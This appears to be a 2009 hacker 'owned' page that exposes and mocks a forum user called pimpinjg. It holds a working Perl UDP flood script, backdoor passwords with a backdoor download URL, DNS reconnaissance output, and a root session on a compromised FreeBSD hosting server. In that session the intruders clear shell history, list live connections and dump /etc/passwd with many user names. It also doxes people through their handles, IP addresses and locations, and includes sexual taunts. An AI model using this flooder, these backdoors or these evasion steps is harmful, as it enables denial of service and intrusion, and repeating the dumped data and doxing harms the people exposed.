+ + +pimpinjg +im pimpinjg some of you may know me some of you may not last 2 years ive been studying to become a linux administrator +(wanna start a whitehat security company) i know my shit (you can verify with ViSiOn :hihihi: yeah so sup +Ref: http://madspot.org/forums/viewtopic.php?f=7&t=11107&start=0 + +// How's that going for you? Managed to start your "whitehat" security company? lulz + +pimpinjg +Posted 19 October 2008 - 02:05 PM +i suck at introductions so anyways here i go my names pimpinjg ive been in hacking for about 8 months i am knowledgeable +in vb,C++, and php wanting to learn asm for reverse engineering and whatnot (and some destructive shit) own a +couple warez sites wont release the urls cuz advertising so yeah sup :) +ref: http://darktavern.org/forum/General-f3/Introduction-f20/Pimpinjg-t11469.html + +// 8 months? Is this a bad joke or a tragedy? + + +pimpinjg +is there anyway to make it auto delete suspicious files becuz im getting backdoored and im not ready for an os reload +till i get a good backup.. +ref: http://forum.configserver.com/showthread.php?p=4535 + +// Did your lover backdoor you? Do you drop the soap on command now? + + +----- copyandpaste.info ----- + +----------------- +Host's addresses: +----------------- + copyandpaste.info. 5 IN A 76.175.20.182 + +------------- +Name servers: +------------- + ns2.afraid.org. 5 IN A 66.252.5.14 + ns4.afraid.org. 5 IN A 67.18.179.15 + ns3.afraid.org. 5 IN A 72.20.15.62 + ns1.afraid.org. 5 IN A 67.19.72.206 + +----------- +MX record: +----------- + aspmx.l.google.com. 5 IN A 209.85.219.26 + +--------------------- +Trying Zonetransfers: +--------------------- + + trying zonetransfer for copyandpaste.info on ns2.afraid.org ... + + trying zonetransfer for copyandpaste.info on ns3.afraid.org ... + + trying zonetransfer for copyandpaste.info on ns4.afraid.org ... + + trying zonetransfer for copyandpaste.info on ns1.afraid.org ... 
+ +------------------------------ +Brute forcing with dns.txt: +------------------------------ + ftp.copyandpaste.info. 5 IN A 67.19.72.202 + irc.copyandpaste.info. 5 IN A 94.102.58.212 + mail.copyandpaste.info. 5 IN A 67.19.72.202 + www.copyandpaste.info. 5 IN CNAME copyandpaste.info. + copyandpaste.info. 5 IN A 76.175.20.182 + +------------------------------- +copyandpaste.info c class netranges: +------------------------------- + 67.19.72.0/24 + 76.175.20.0/24 + 94.102.58.0/24 + + +WebHostingTalk Rumors +--------------------- + +* 7/4/2009 1:19 am Heads up - Openssh 4.3* 0day +* 6/9/2009 7:38 am Astalavista got hacked +* 5/10/2009 9:15 am Post Your Server Uptime + +ref: http://www.webhostingtalk.com/profile/HRDev%20Jason + +// HR-Development.net the Anti-DDOS Specialist ? aka anti-sec? + + +HRDev Jason HRDev Jason is offline +View Beta Profile +New Member +Join Date: Mar 2009 +Posts: 3 +hm, just gona put a shot in the dark here, nowayout the security expert! aka 'glafkos' and (but not limited too) astalavista staff? + +ref: http://www.webhostingtalk.com/showthread.php?p=6269877#post6269877 + +// Hm.. Jason (pimpinjg), did the 8 months of hacking made you a security expert? + +Old 06-09-2009, 08:38 AM +HRDev Jason HRDev Jason is offline +View Beta Profile +New Member +Join Date: Mar 2009 +Posts: 3 +looks like the same hacker group striked again? +pastebin.com/m592e1f1c +i wonder what his obsession is with astalavista staff? +and from the looks of it he has a 0day grsecurity exploit too, its getting really bad + +ref: http://www.webhostingtalk.com/showthread.php?p=6227267#post6227267 + +// Being the anti-sec bitch, it is expected to spread misleading rumors like grsec, jail break and so on.. + +HRDev Jason HRDev Jason is offline +View Beta Profile +New Member +Join Date: Mar 2009 +Posts: 3 +This thread needs life! 
&& bump +Intel(R) Pentium(R) 4 CPU 2.40GHz, 2gb Kingston (ddr2) ram 150GB WD HDD +[root@mercedes ~]# uptime +07:02:59 up 56 days, 20:06, 1 user, load average: 0.01, 0.05, 0.01 +[root@mercedes ~]# + +ref: http://www.webhostingtalk.com/showthread.php?p=6175336#post6175336 + + + +romeo@mercedes~$ // romeo.copyandpaste.info + + +
+
+                 __   .__                        
+_____     ____ _/  |_ |__|  ______  ____   ____  
+\__  \   /    \\   __\|  | /  ___/_/ __ \_/ ___\ 
+ / __ \_|   |  \|  |  |  | \___ \ \  ___/\  \___ 
+(____  /|___|  /|__|  |__|/____  > \___  >\___  >
+     \/      \/ # rm -rf /     \/      \/     \/Movement
+ 
+						~ Fuck full-disclosure
+                                                ~ Fuck the security industry
+						~ Keep 0days private
+						~ Hack everyone you can and then hack some more
+ 
+
+
+http://i43.tinypic.com/21317c6.png // [root@mercedes ~]# 
+
+/* It is clear that you and RoMeO was sharing the same hr-dev server with the following domains:
+
+evilzone.ws
+h4ckinab0x.com
+hr-development.net
+phone.addresses.com
+phone.theyellowpages.com
+aaasoda.com
+beyond-comparison.com
+hotglowneon.com
+yourkicksonline.com
+yourkicksonline.net
+blitzcraze.com
+blitzdownloads.com
+bloohacks.com
+bootforfun.com
+crypticgamers.com
+crypticgamers.net
+darkmindz.com
+furiogaming.net
+godlymods.com
+h3mod.com
+h4ckinab0x.com
+hackordie.net
+halostrike.com
+iexpl0it.net
+mods4hire.com
+mortonnetworks.com
+oinfam0uso.com
+pagewizzstudio.com
+phylumstudios.com
+samcraft.com
+scionbot.com
+snayke.com
+softmodding.net
+teamunix.org
+theconsolejunkies.com
+undergr0undhackers.com
+vbcoderz.com
+1nesolution.com
+bootforfun.com
+crypticgamers.net
+cybershade.org
+darkmindz.com
+furiogaming.com
+gotmovies.net
+h3mod.com
+halostrike.com
+keytraderz.com
+samcraft.com
+sounddistrict.com
+theconsolejunkies.com
+
+*/
+
+
+
+#!/usr/bin/perl
+# udp
+#flooder.pl coded by pimpinjg
+
+print q{
+====================================================                                                                             
+=						   =
+=                                        Coded By  =
+=                                                  =
+=                                       pimpinjg   =
+=                                                  =
+=                                team  h4ckinab0x  =
+=                                                  =
+=                                h4ckinab0x.com    =
+=                                                  =
+====================================================
+};
+
+use io::socket;
+
+print "Host: ";
+chop ($host = );
+print "Port: ";
+chop ($port = );
+
+{
+$sock = IO::Socket::INET->new (
+                PeerAddr => $host,
+                PeerPort => $port,
+                Proto => 'udp') || die "$! Make sure the IP/host or port number is correct";
+}
+packets:
+while (1) {
+$size = rand() * 200 * 2000;
+print ("$host:$port packet size: $size\n");
+send($sock, 0, $size);
+}
+
+ref: http://www.studentshangout.com/topic/99723-udp-flodder/
+
+// anti-ddos specialist @ hr-dev.. 
+
+
+_______         _______  ________  
+\   _  \ ___  __\   _  \ \_____  \ 
+/  /_\  \\  \/  /  /_\  \  _(__  < 
+\  \_/   \>    <\  \_/   \/       \
+ \_____  /__/\_ \\_____  /______  /
+       \/      \/      \/       \/ 
+                                                            __             
+  ______  _  ______ _____     ____   ____      ____   _____/  |_           
+ /  _ \ \/ \/ /    \\__  \   / ___\_/ __ \    /    \_/ __ \   __\   ______ 
+(  <_> )     /   |  \/ __ \_/ /_/  >  ___/   |   |  \  ___/|  |    /_____/ 
+ \____/ \/\_/|___|  (____  /\___  / \___  > /\___|  /\___  >__|            
+                  \/     \//_____/      \/  \/    \/     \/                
+__________                _________              
+\______   \_______  ____ /   _____/ ____   ____  
+ |     ___/\_  __ \/  _ \\_____  \_/ __ \_/ ___\ 
+ |    |     |  | \(  <_> )        \  ___/\  \___ 
+ |____|     |__|   \____/_______  /\___  >\___  >
+                                \/     \/     \/ 
+
+
+
+/* 
+Random Backdoor Passwords: Sk3rhGLdYW, 0x3a0wnt, RAzDX1lFd8
+Backdoor http://board.whois.co.kr/lol.tar.gz (malloc is your enemy)
+*/
+
+This is a private computer system which is restricted to authorized individuals.
+Actual or attempted unauthorized use of this computer system will result in criminal
+and/or civil prosecution.  This system is owned by Vitalspeeds Corporation of Wisconsin.
+To purchase an account please visit us at http://www.vitalspeeds.com.
+
+FreeBSD 6.2-RELEASE-p3 (VITAL) #0: Sun Apr 15 19:59:55 PDT 2007
+
+
+                              Welcome
+                                to
+  ___ ___ __ __          __                             __
+ |   |   |__|  |_.---.-.|  |.-----.-----.-----.-----.--|  |.-----.
+ |   |   |  |   _|  _  ||  ||__ --|  _  |  -__|  -__|  _  ||__ --|
+  \_____/|__|____|___._||__||_____|   __|_____|_____|_____||_____|
+                                  |__|
+
+
+
+ By entering or accessing this server, you hereby agree to the Acceptable
+      Use Policy and any other terms and conditions listed on our website.
+
+     Type 'vhosts' for a list of the virtual hosts that can be used on
+           this system. You can view this again by typing 'motd'.
+
+               Support can be obtained in #vitalspeeds on EFnet.
+
+                       http://www.vitalspeeds.com/
+
+
+Perm - All support requests should go through our Ticket system @
+https://billing.vitalspeeds.com or IRC@EFnet #Vitalspeeds .
+
+Commands: vhosts, BitchX
+NOTE: Eggdrop/BNCS use ports over 35000.
+
+April 12 2007 : Hard drive failure, all data is gone as we do not keep backups of shell accounts as per the terms of 
+service. Check your welcome email for user info etc. 
+
+                +----------------------------[ Owned ]----------------------------+
+                |          Hack everyone you can and then hack some more          | // romeo.copyandpaste.info
+                |                           Owned[DC] v2                          |
+                |                   _______ . _______ . _______                   |
+                |             Get in as anonymous, Leave with no trace.           |
+                |                                                                 |
+                +-----------------------------------------------------------------+
+         [ FreeBSD velocity.vitalspeeds.com 6.2-RELEASE-p3 i386 ]
+
+ 6:30PM  up 518 days,  6:58, 2 users, load averages: 0.33, 0.26, 0.24
+yaquis           ttyp1    ip72-223-92-235. Sun Jun 28 18:12   still logged in
+yaquis           ttyp1    ip72-223-92-235. Sun Jun 28 17:00 - 17:39  (00:38)
+katsst           ttyp1    cpe-75-84-149-5. Sun Jun 28 16:07 - 16:37  (00:30)
+dark             ftp      modemcable089.1  Sun Jun 28 15:45 - 15:45  (00:00)
+smash            ttyp1    89.30.147.8      Sun Jun 28 15:30 - 15:50  (00:19)
+[root@velocity:~]# w
+ 6:30PM  up 518 days,  6:58, 2 users, load averages: 0.43, 0.28, 0.25
+USER             TTY      FROM              LOGIN@  IDLE WHAT
+romeo            p0       :ttyp2:S.0       Thu11PM     - irssi -h absolute.ownage.net
+yaquis           p1       ip72-223-92-235.  6:12PM     - -bash (bash)
+
+
+[root@velocity:~]# export HISTSIZE=0
+[root@velocity:~]# export HISTFILE=/dev/null
+[root@velocity:~]# env
+TERM=vt100
+SHELL=/usr/local/bin/bash
+HISTSIZE=1500
+SSH_CLIENT=1.3.3.7 6173 22
+SSH_TTY=/dev/ttyp1
+USER=root
+SSH_AUTH_SOCK=/tmp/ssh-M0YqjqZvAN/agent.70342
+PAGER=more
+LSCOLORS=ExGxFxf5CxfgDxabagacad
+MAIL=/var/mail/root
+PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/X11R6/bin
+PWD=/root
+EDITOR=pico
+PS1=[\u@\h:\w]\$ 
+SHLVL=1
+HOME=/root
+LOGNAME=root
+SSH_CONNECTION=1.3.3.7 6173 72.20.28.205 22
+HISTFILE=/dev/null
+_=/usr/bin/env
+[root@velocity:~]# w
+ 7:36PM  up 513 days,  8:04, 2 users, load averages: 0.43, 0.48, 0.43
+USER             TTY      FROM              LOGIN@  IDLE WHAT
+romeo            p9       :ttypf:S.0       Wed06AM     1 irssi -h absolute.ownage.net
+pimpinjg         pe       cpe-76-175-20-18 Mon09PM  1:15 irssi -h 72.20.28.206 // points to copyandpaste.info
+[root@velocity:/]# date
+Tue Jun 23 20:30:52 CDT 2009
+[root@velocity:/]# uname -a
+FreeBSD velocity.vitalspeeds.com 6.2-RELEASE-p3 FreeBSD 6.2-RELEASE-p3 #0: Sun Apr 15 19:59:55 PDT 2007     root@velocity.vitalspeeds.com:/usr/obj/usr/src/sys/VITAL  i386
+
+[root@velocity:~]# sysctl -a | egrep -i 'hw.machine|hw.model|hw.ncpu'
+hw.machine: i386
+hw.model: Intel(R) Pentium(R) 4 CPU 2.80GHz
+hw.ncpu: 1
+hw.machine_arch: i386
+
+
+[root@velocity:~]# ls -la
+total 72
+drwxr-xr-x   6 root  wheel   512 Jun 26 02:08 ./
+drwxr-xr-x  21 root  wheel   512 Nov  5  2008 ../
+-rw-------   1 root  wheel  4356 Jun 11 08:02 .bash_history
+-rw-r--r--   2 root  wheel   801 Jan 12  2007 .cshrc
+-rw-------   1 root  wheel     5 Apr 15  2007 .history
+drwx------   2 root  wheel   512 Jun 11 10:25 .irssi/
+-rw-r--r--   1 root  wheel   143 Jan 12  2007 .k5login
+-rw-------   1 root  wheel    35 Jun 25 16:35 .lesshst
+-rw-r--r--   1 root  wheel   293 Jan 12  2007 .login
+-rw-------   1 root  wheel  2164 Jun 23 20:21 .lsof_velocity
+-rw-r--r--   2 root  wheel   251 Jan 12  2007 .profile
+drwx------   2 root  wheel   512 Apr 13  2007 .ssh/
+drwxr-xr-x   2 root  wheel   512 Jun 24 18:00 kernels/
+drwxr-xr-x   2 root  wheel   512 Nov  5  2008 supfiles/
+-rwxr--r--   1 root  wheel   477 Nov  5  2008 update.sh*
+
+[root@velocity:~]# lsof -i -n | grep ssh
+sshd      43929      devil    3u  IPv4 0xca224000      0t0  TCP *:search (LISTEN)
+sshd      43929      devil    5u  IPv6 0xca6b5cb0      0t0  TCP *:search (LISTEN)
+sshd      43929      devil    7u  IPv4 0xca0653a0      0t0  TCP 72.20.3.98:search->189.158.227.97:1036 (ESTABLISHED)
+sshd      43929      devil   87u  IPv4 0xcafd2570      0t0  TCP 72.20.28.196:51129->69.16.172.40:afs3-fileserver (ESTABLISHED)
+sshd      43929      devil  154u  IPv4 0xc98913a0      0t0  TCP 72.20.28.210:52054->82.196.213.250:ircd (ESTABLISHED)
+sshd      43929      devil  167u  IPv4 0xcc5a73a0      0t0  TCP 72.20.28.196:49651->84.208.29.17:afs3-fileserver (ESTABLISHED)
+sshd      43929      devil  192u  IPv4 0xcb023910      0t0  TCP 72.20.28.196:50866->69.16.172.34:afs3-fileserver (ESTABLISHED)
+sshd      60220       root    3u  IPv4 0xc92c9000      0t0  TCP 72.20.28.248:ssh->188.52.81.126:10662 (ESTABLISHED) // RoMeO Saudi Arabia
+sshd      60382       root    3u  IPv4 0xc50a51d0      0t0  TCP 72.20.28.248:ssh->188.52.81.126:10696 (ESTABLISHED)
+sshd      64492       root    3u  IPv6 0xcc1883a0      0t0  TCP *:ssh (LISTEN)
+sshd      64492       root    4u  IPv4 0xc970d3a0      0t0  TCP *:ssh (LISTEN)
+sshd      74777       root    3u  IPv4 0xc9dd8570      0t0  TCP 72.20.28.248:ssh->66.229.253.149:27655 (ESTABLISHED)
+sshd      74779     ioplex    3u  IPv4 0xc9dd8570      0t0  TCP 72.20.28.248:ssh->66.229.253.149:27655 (ESTABLISHED)
+sshd      74779     ioplex    7u  IPv4 0xc9f58cb0      0t0  TCP 127.0.0.1:56073->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex    8u  IPv4 0xc91ff1d0      0t0  TCP 127.0.0.1:57500->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex    9u  IPv4 0xc6230910      0t0  TCP 127.0.0.1:64660->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex   10u  IPv4 0xc9a37ae0      0t0  TCP 127.0.0.1:49761->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex   12u  IPv4 0xc9a93740      0t0  TCP 127.0.0.1:64920->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex   13u  IPv4 0xc97d21d0      0t0  TCP 127.0.0.1:52350->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex   14u  IPv4 0xc5c30000      0t0  TCP 127.0.0.1:51650->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex   15u  IPv4 0xca1cf1d0      0t0  TCP 127.0.0.1:49153->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex   16u  IPv4 0xcc1731d0      0t0  TCP 127.0.0.1:51808->127.0.0.1:48259 (ESTABLISHED)
+sshd      74779     ioplex   17u  IPv4 0xcc592cb0      0t0  TCP 127.0.0.1:53451->127.0.0.1:48259 (ESTABLISHED)
+[root@velocity:~]# 
+
+[root@velocity:/var/run]# cat /etc/passwd 
+# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
+#
+root:*:0:0:Charlie &:/root:/usr/local/bin/bash
+toor:*:0:0:Bourne-again Superuser:/root:
+daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
+operator:*:2:5:System &:/:/usr/sbin/nologin
+bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
+tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
+kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
+games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
+news:*:8:8:News Subsystem:/:/usr/sbin/nologin
+man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
+sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
+smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
+mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
+bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
+proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
+_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
+_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
+uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
+pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
+www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
+nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
+nsc:*:1001:0:User &:/home/nsc:/bin/sh
+sysc:*:1002:1002:User &:/home/sysc:/usr/local/bin/bash
+vividbreeze:*:1003:1003:User &:/home/vividbreeze:/usr/local/bin/bash
+sharpie:*:1036:1036:User &:/home/sharpie:/usr/local/bin/bash
+cappy57:*:1038:1038:User &:/home/cappy57:/usr/local/bin/bash
+zoo:*:1039:1039:User &:/home/zoo:/usr/local/bin/bash
+dark:*:1041:1041:User &:/home/dark:/usr/local/bin/bash
+evino:*:1042:1042:User &:/home/evino:/usr/local/bin/bash
+dano30:*:1043:1043:User &:/home/dano30:/usr/local/bin/bash
+daali:*:1044:1044:User &:/home/daali:/usr/local/bin/bash
+skit:*:1045:1045:User &:/home/skit:/usr/local/bin/bash
+l33t:*:1047:1047:User &:/home/l33t:/usr/local/bin/bash
+tlm:*:1049:1049:User &:/home/tlm:/usr/local/bin/bash
+itzkorn:*:1051:1051:User &:/home/itzkorn:/usr/local/bin/bash
+groove:*:1052:1052:User &:/home/groove:/usr/local/bin/bash
+en0prcv:*:1054:1054:User &:/home/en0prcv:/usr/local/bin/bash
+poolboy:*:1055:1055:User &:/home/poolboy:/usr/local/bin/bash
+bollox:*:1058:1058:User &:/home/bollox:/usr/local/bin/bash
+vamp:*:1059:1059:User &:/home/vamp:/usr/local/bin/bash
+genosyde:*:1060:1060:User &:/home/genosyde:/usr/local/bin/bash
+y2j:*:1061:1061:User &:/home/y2j:/usr/local/bin/bash
+katsst:*:1062:1062:User &:/home/katsst:/usr/local/bin/bash
+nexxtea:*:1063:1063:User &:/home/nexxtea:/usr/local/bin/bash
+quinn:*:1064:1064:User &:/home/quinn:/usr/local/bin/bash
+crash:*:1066:1066:User &:/home/crash:/usr/local/bin/bash
+safety:*:1067:1067:User &:/home/safety:/usr/local/bin/bash
+crazyl:*:1069:1069:User &:/home/crazyl:/usr/local/bin/bash
+tarawa:*:1071:1071:User &:/home/tarawa:/usr/local/bin/bash
+athemp:*:1077:1077:User &:/home/athemp:/usr/local/bin/bash
+cazz1961:*:1087:1087:User &:/home/cazz1961:/usr/local/bin/bash
+vitalrbj:*:1088:1088:User &:/home/vitalrbj:/usr/local/bin/bash
+digitalman:*:1090:1090:User &:/home/digitalman:/usr/local/bin/bash
+timgor:*:1096:1096:User &:/home/timgor:/usr/local/bin/bash
+techi3:*:1098:1098:User &:/home/techi3:/usr/local/bin/bash
+apo:*:1099:1099:User &:/home/apo:/usr/local/bin/bash
+blkgraz:*:1100:1100:User &:/home/blkgraz:/usr/local/bin/bash
+jamesn:*:1101:1101:User &:/home/jamesn:/usr/local/bin/bash
+sacred:*:1103:1103:User &:/home/sacred:/usr/local/bin/bash
+jschultk:*:1104:1104:User &:/home/jschultk:/usr/local/bin/bash
+narcissu:*:1105:1105:User &:/home/narcissu:/usr/local/bin/bash
+neohax:*:1115:1115:User &:/home/neohax:/usr/local/bin/bash
+ceejay:*:1119:1119:User &:/home/ceejay:/usr/local/bin/bash
+wolf:*:1126:1126:User &:/home/wolf:/usr/local/bin/bash
+warlordz:*:1129:1129:User &:/home/warlordz:/usr/local/bin/bash
+hh360:*:1130:1130:User &:/home/hh360:/usr/local/bin/bash
+simonbh:*:1133:1133:User &:/home/simonbh:/usr/local/bin/bash
+crazie:*:1134:1134:User &:/home/crazie:/bin/tcsh
+burnt:*:1136:1136:User &:/home/burnt:/usr/local/bin/bash
+xckx:*:1139:1139:User &:/home/xckx:/bin/sh
+f3d0r:*:1140:1140:User &:/home/f3d0r:/usr/local/bin/bash
+khicks:*:1145:1145:User &:/home/khicks:/usr/local/bin/bash
+schlomer:*:1147:1147:User &:/home/schlomer:/usr/local/bin/bash
+nodex:*:1153:1153:User &:/home/nodex:/usr/local/bin/bash
+crrj13:*:1155:1155:User &:/home/crrj13:/usr/local/bin/bash
+dravas:*:1157:1157:User &:/home/dravas:/usr/local/bin/bash
+sinistro:*:1170:1170:User &:/home/sinistro:/usr/local/bin/bash
+izedd:*:1172:1172:User &:/home/izedd:/usr/local/bin/bash
+chevym4n:*:1174:1174:User &:/home/chevym4n:/usr/local/bin/bash
+edgein:*:1175:1175:User &:/home/edgein:/usr/local/bin/bash
+shoes:*:1178:1178:User &:/home/shoes:/usr/local/bin/bash
+zenchi:*:1179:1179:User &:/home/zenchi:/usr/local/bin/bash
+darien9:*:1180:1180:User &:/home/darien9:/usr/local/bin/bash
+reaper90:*:1181:1181:User &:/home/reaper90:/usr/local/bin/bash
+bnoel:*:1183:1183:User &:/home/bnoel:/usr/local/bin/bash
+hts:*:1188:1188:User &:/home/hts:/usr/local/bin/bash
+hw4tbnc:*:1190:1190:User &:/home/hw4tbnc:/usr/local/bin/bash
+xavi:*:1192:1192:User &:/home/xavi:/usr/local/bin/bash
+kruapra:*:1193:1193:User &:/home/kruapra:/usr/local/bin/bash
+bbblade1:*:1197:1197:User &:/home/bbblade1:/usr/local/bin/bash
+oby1:*:1198:1198:User &:/home/oby1:/usr/local/bin/bash
+ltootle:*:1199:1199:User &:/home/ltootle:/usr/local/bin/bash
+zime:*:1200:1200:User &:/home/zime:/usr/local/bin/bash
+ksafusi:*:1202:1202:User &:/home/ksafusi:/usr/local/bin/bash
+methanl:*:1205:1205:User &:/home/methanl:/usr/local/bin/bash
+anux:*:1206:1206:User &:/home/anux:/usr/local/bin/bash
+tea:*:1207:1207:User &:/home/tea:/usr/local/bin/bash
+ircjaymz:*:1210:1210:User &:/home/ircjaymz:/usr/local/bin/bash
+coolcat:*:1211:1211:User &:/home/coolcat:/usr/local/bin/bash
+zeepysea:*:1213:1213:User &:/home/zeepysea:/usr/local/bin/bash
+darkevil:*:1214:1214:User &:/home/darkevil:/usr/local/bin/bash
+grindey:*:1215:1215:User &:/home/grindey:/usr/local/bin/bash
+silver15:*:1216:1216:User &:/home/silver15:/usr/local/bin/bash
+smash:*:1218:1218:User &:/home/smash:/usr/local/bin/bash
+reznik:*:1219:1219:User &:/home/reznik:/usr/local/bin/bash
+omelette:*:1222:1222:User &:/home/omelette:/usr/local/bin/bash
+mimik0r:*:1223:1223:User &:/home/mimik0r:/usr/local/bin/bash
+owine:*:1224:1224:User &:/home/owine:/usr/local/bin/bash
+manboo:*:1225:1225:User &:/home/manboo:/usr/local/bin/bash
+corley:*:1231:1231:User &:/home/corley:/usr/local/bin/bash
+sqd:*:1233:1233:User &:/home/sqd:/usr/local/bin/bash
+mooo:*:1234:1234:User &:/home/mooo:/usr/local/bin/bash
+comedy:*:1235:1235:User &:/home/comedy:/usr/local/bin/bash
+lynx:*:1236:1236:User &:/home/lynx:/usr/local/bin/bash
+prodigy:*:1237:1237:User &:/home/prodigy:/usr/local/bin/bash
+chrirc:*:1238:1238:User &:/home/chrirc:/usr/local/bin/bash
+lyhne1:*:1242:1242:User &:/home/lyhne1:/usr/local/bin/bash
+percott1:*:1243:1243:User &:/home/percott1:/usr/local/bin/bash
+djspark:*:1244:1244:User &:/home/djspark:/usr/local/bin/bash
+ac1115:*:1246:1246:User &:/home/ac1115:/usr/local/bin/bash
+asriel:*:1247:1247:User &:/home/asriel:/usr/local/bin/bash
+devil:*:1248:1248:User &:/home/devil:/usr/local/bin/bash
+lymelyte:*:1249:1249:User &:/home/lymelyte:/usr/local/bin/bash
+cmm:*:1250:1250:User &:/home/cmm:/usr/local/bin/bash
+nek0o:*:1252:1252:User &:/home/nek0o:/usr/local/bin/bash
+baxxta:*:1253:1253:User &:/home/baxxta:/usr/local/bin/bash
+bruhaha:*:1254:1254:User &:/home/bruhaha:/usr/local/bin/bash
+dv327:*:1258:1258:User &:/home/dv327:/usr/local/bin/bash
+voxitize:*:1261:1261:User &:/home/voxitize:/usr/local/bin/bash
+own3d:*:1262:1262:User &:/home/own3d:/usr/local/bin/bash
+feed:*:1264:1264:User &:/home/feed:/usr/local/bin/bash
+yaquis:*:1266:1266:User &:/home/yaquis:/usr/local/bin/bash
+bpunux:*:1269:1269:User &:/home/bpunux:/usr/local/bin/bash
+skypilot:*:1271:1271:User &:/home/skypilot:/usr/local/bin/bash
+blake96:*:1272:1272:User &:/home/blake96:/usr/local/bin/bash
+blotch:*:1274:1274:User &:/home/blotch:/usr/local/bin/bash
+scouse:*:1275:1275:User &:/home/scouse:/usr/local/bin/bash
+mogle3:*:1276:1276:User &:/home/mogle3:/usr/local/bin/bash
+ste:*:1277:1277:User &:/home/ste:/usr/local/bin/bash
+omgwtf:*:1281:1281:User &:/home/omgwtf:/usr/local/bin/bash
+brosb4:*:1283:1283:User &:/home/brosb4:/usr/local/bin/bash
+mindben:*:1284:1284:User &:/home/mindben:/usr/local/bin/bash
+hixk:*:1286:1286:User &:/home/hixk:/usr/local/bin/bash
+omen:*:1287:1287:User &:/home/omen:/usr/local/bin/bash
+sakik1:*:1290:1290:User &:/home/sakik1:/usr/local/bin/bash
+chriys:*:1291:1291:User &:/home/chriys:/usr/local/bin/bash
+jtracy:*:1292:1292:User &:/home/jtracy:/usr/local/bin/bash
+roodyk:*:1293:1293:User &:/home/roodyk:/usr/local/bin/bash
+qfx:*:1295:1295:User &:/home/qfx:/usr/local/bin/bash
+chrisdad:*:1296:1296:User &:/home/chrisdad:/usr/local/bin/bash
+rice21:*:1298:1298:User &:/home/rice21:/usr/local/bin/bash
+wchan21:*:1299:1299:User &:/home/wchan21:/usr/local/bin/bash
+xkelsx:*:1300:1300:User &:/home/xkelsx:/usr/local/bin/bash
+jerryste:*:1302:1302:User &:/home/jerryste:/usr/local/bin/bash
+pbx:*:1303:1303:User &:/home/pbx:/usr/local/bin/bash
+mlh:*:1307:1307:User &:/home/mlh:/usr/local/bin/bash
+howell1:*:1308:1308:User &:/home/howell1:/usr/local/bin/bash
+djkarl:*:1309:1309:User &:/home/djkarl:/usr/local/bin/bash
+subkult:*:1310:1310:User &:/home/subkult:/usr/local/bin/bash
+dealer:*:1311:1311:User &:/home/dealer:/bin/sh
+cont:*:1312:1312:User &:/home/cont:/usr/local/bin/bash
+ircusr:*:1313:1313:User &:/home/ircusr:/usr/local/bin/bash
+lordy:*:1314:1314:User &:/home/lordy:/usr/local/bin/bash
+chozen1:*:1315:1315:User &:/home/chozen1:/usr/local/bin/bash
+nardi:*:1316:1316:User &:/home/nardi:/usr/local/bin/bash
+ssaws:*:1317:1317:User &:/home/ssaws:/usr/local/bin/bash
+chaos1:*:1318:1318:User &:/home/chaos1:/usr/local/bin/bash
+jax66:*:1319:1319:User &:/home/jax66:/usr/local/bin/bash
+paleride:*:1320:1320:User &:/home/paleride:/usr/local/bin/bash
+kokoryu:*:1321:1321:User &:/home/kokoryu:/usr/local/bin/bash
+bluewish:*:1322:1322:User &:/home/bluewish:/usr/local/bin/bash
+grumpy:*:1323:1323:User &:/home/grumpy:/usr/local/bin/bash
+jaiven:*:1324:1324:jusam69:/home/jaiven:/usr/local/bin/bash
+rikt:*:1325:1325:User &:/home/rikt:/usr/local/bin/bash
+sal:*:1326:1326:User &:/home/sal:/usr/local/bin/bash
+lailoke:*:1327:1327:User &:/home/lailoke:/usr/local/bin/bash
+kingzy:*:1328:1328:User &:/home/kingzy:/usr/local/bin/bash
+delion1:*:1329:1329:User &:/home/delion1:/usr/local/bin/bash
+vietnigh:*:1330:1330:User &:/home/vietnigh:/usr/local/bin/bash
+darkuno3:*:1331:1331:User &:/home/darkuno3:/usr/local/bin/bash
+mae21:*:1332:1332:User &:/home/mae21:/usr/local/bin/bash
+redrum:*:1333:1333:User &:/home/redrum:/usr/local/bin/bash
+cpu:*:1334:1334:User &:/home/cpu:/usr/local/bin/bash
+cassand:*:1335:1335:User &:/home/cassand:/usr/local/bin/bash
+nyakz:*:1336:1336:User &:/home/nyakz:/usr/local/bin/bash
+ioplex:*:1337:1337:User &:/home/ioplex:/usr/local/bin/bash
+dasboot:*:1338:1338:User &:/home/dasboot:/usr/local/bin/bash
+visage:*:1339:1339:User &:/home/visage:/usr/local/bin/bash
+brosco:*:1340:1340:User &:/home/brosco:/usr/local/bin/bash
+mrts:*:1341:1341:User &:/home/mrts:/usr/local/bin/bash
+qberto:*:1342:1342:User &:/home/qberto:/usr/local/bin/bash
+kooner:*:1343:1343:User &:/home/kooner:/usr/local/bin/bash
+matt:*:1344:1344:User &:/home/matt:/usr/local/bin/bash
